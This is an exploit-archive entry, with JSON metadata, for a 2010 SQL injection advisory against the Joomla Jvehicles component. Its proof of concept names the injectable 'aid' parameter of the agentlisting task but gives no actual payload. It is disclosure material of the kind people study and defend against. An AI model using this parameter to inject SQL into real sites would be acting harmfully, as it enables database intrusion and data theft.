Search...

Joomla! Component Jvehicles 1.02.0 - aid SQL Injection

2010-04-13T00:00:00

ID EXPLOITPACK:167C95B0D8BB06D88FE29F2B038DE99A
Type exploitpack
Reporter Don Tukulesto
Modified 2010-04-13T00:00:00

Description

Joomla! Component Jvehicles 1.02.0 - aid SQL Injection

                                        
                                            /**************************************************************************

[!] Joomla Component Jvehicles (aid) SQL Injection Vulnerability
[!] Author	: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage	: http://indonesiancoder.com
[!] Date	: Mon, April 12, 2010
[!] Tune in	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[&gt;] Vendor	: http://www.jvehicles.com
[&gt;] Download	: http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=fileinfo&id=6&#9001;=en
[&gt;] Version	: 1.0 and 2.0
[&gt;] License	: GPL
[&gt;] Type	: Non-Commercial
[&gt;] Method	: SQL Injection

========================================================

[ Proof of Concept ]

http://server/path/index.php?option=com_jvehicles&task=agentlisting&aid=31337

========================================================

[ Cheers ]

[&gt;] Chip D3 Bi0s : find the 1st bug with method Local File Inclusion
[&gt;] Indonesian Coder Team - AntiSecurity - ServerIsDown - SurabayaHackerLink
[&gt;] My brother M364TR0N - kaMtiEz - Gonzhack - El N4ck0 - ibl13Z - arianom - YaDoY666 - ./Jack-
[&gt;] elv1n4 - xshadow - SAINT - Cyb3r_tr0n - M3NW5 - Pathloader - Mboys - Contrex - amxku - inj3ct0r
[&gt;] xnitro @xtremenitro.org - DraCoola - r3m1ck - Senot - ran - CherCut
[&gt;] James Brown & Todd @packetstormsecurity.org - Maksymilian & sp3x @securityreason.com


[ Notes ]

[&gt;] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:23", "references": [], "description": "\nJoomla! Component Jvehicles 1.02.0 - aid SQL Injection", "edition": 1, "reporter": "Don Tukulesto", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-04-13T00:00:00", "title": "Joomla! Component Jvehicles 1.02.0 - aid SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:23", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2020-04-01T19:04:23", "rev": 2}, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-04-13T00:00:00", "id": "EXPLOITPACK:167C95B0D8BB06D88FE29F2B038DE99A", "href": "", "viewCount": 2, "sourceData": "/**************************************************************************\n\n[!] Joomla Component Jvehicles (aid) SQL Injection Vulnerability\n[!] Author\t: Don Tukulesto (root@indonesiancoder.com)\n[!] Homepage\t: http://indonesiancoder.com\n[!] Date\t: Mon, April 12, 2010\n[!] Tune in\t: http://antisecradio.fm (choose your weapon)\n\n**************************************************************************/\n\n[ Software Information ]\n\n[>] Vendor\t: http://www.jvehicles.com\n[>] Download\t: http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=fileinfo&id=6〈=en\n[>] Version\t: 1.0 and 2.0\n[>] License\t: GPL\n[>] Type\t: Non-Commercial\n[>] Method\t: SQL Injection\n\n========================================================\n\n[ Proof of Concept ]\n\nhttp://server/path/index.php?option=com_jvehicles&task=agentlisting&aid=31337\n\n========================================================\n\n[ Cheers ]\n\n[>] Chip D3 Bi0s : find the 1st bug with method Local File Inclusion\n[>] Indonesian Coder Team - AntiSecurity - ServerIsDown - SurabayaHackerLink\n[>] My brother M364TR0N - kaMtiEz - Gonzhack - El N4ck0 - ibl13Z - arianom - YaDoY666 - ./Jack-\n[>] elv1n4 - xshadow - SAINT - Cyb3r_tr0n - M3NW5 - Pathloader - Mboys - Contrex - amxku - inj3ct0r\n[>] xnitro @xtremenitro.org - DraCoola - r3m1ck - Senot - ran - CherCut\n[>] James Brown & Todd @packetstormsecurity.org - Maksymilian & sp3x @securityreason.com\n\n\n[ Notes ]\n\n[>] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM", "cvss": {"score": 0.0, "vector": "NONE"}}